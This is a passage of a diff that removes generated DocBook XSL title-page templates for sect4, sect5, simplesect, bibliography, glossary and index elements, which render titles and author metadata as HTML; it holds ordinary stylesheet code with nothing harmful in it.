-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="sect5info/title">
-      <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="sect5info/subtitle">
-      <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/corpauthor"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/authorgroup"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/author"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/othercredit"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/releaseinfo"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/copyright"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/legalnotice"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/pubdate"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/revision"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/revhistory"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/abstract"/>
-  <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect5.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="sect5.titlepage.before.recto"/>
-      <xsl:call-template name="sect5.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="sect5.titlepage.before.verso"/>
-      <xsl:call-template name="sect5.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="sect5.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect5.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect5.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="simplesectinfo/title">
-      <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/title"/>
-    </xsl:when>
-    <xsl:when test="docinfo/title">
-      <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="simplesectinfo/subtitle">
-      <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/corpauthor"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/authorgroup"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/author"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/author"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/othercredit"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/releaseinfo"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/copyright"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/copyright"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/legalnotice"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/pubdate"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/revision"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/revision"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/revhistory"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/abstract"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/abstract"/>
-  <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="simplesect.titlepage.before.recto"/>
-      <xsl:call-template name="simplesect.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="simplesect.titlepage.before.verso"/>
-      <xsl:call-template name="simplesect.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="simplesect.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="simplesect.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="simplesect.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.recto">
-  <div xsl:use-attribute-sets="bibliography.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::bibliography[1]"/>
-</xsl:call-template></div>
-  <xsl:choose>
-    <xsl:when test="bibliographyinfo/subtitle">
-      <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="bibliographyinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="bibliography.titlepage.before.recto"/>
-      <xsl:call-template name="bibliography.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="bibliography.titlepage.before.verso"/>
-      <xsl:call-template name="bibliography.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="bibliography.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="bibliography.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="bibliography.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="bibliography.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="bibliography.titlepage.recto.style">
-<xsl:apply-templates select="." mode="bibliography.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.recto">
-  <div xsl:use-attribute-sets="glossary.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::glossary[1]"/>
-</xsl:call-template></div>
-  <xsl:choose>
-    <xsl:when test="glossaryinfo/subtitle">
-      <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="glossaryinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="glossary.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="glossary.titlepage.before.recto"/>
-      <xsl:call-template name="glossary.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="glossary.titlepage.before.verso"/>
-      <xsl:call-template name="glossary.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="glossary.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="glossary.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="glossary.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="glossary.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="glossary.titlepage.recto.style">
-<xsl:apply-templates select="." mode="glossary.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="index.titlepage.recto">
-  <div xsl:use-attribute-sets="index.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::index[1]"/>
-</xsl:call-template></div>
-  <xsl:choose>
-    <xsl:when test="indexinfo/subtitle">
-      <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="indexinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="index.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="index.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="index.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="index.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="index.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="index.titlepage.before.recto"/>
-      <xsl:call-template name="index.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
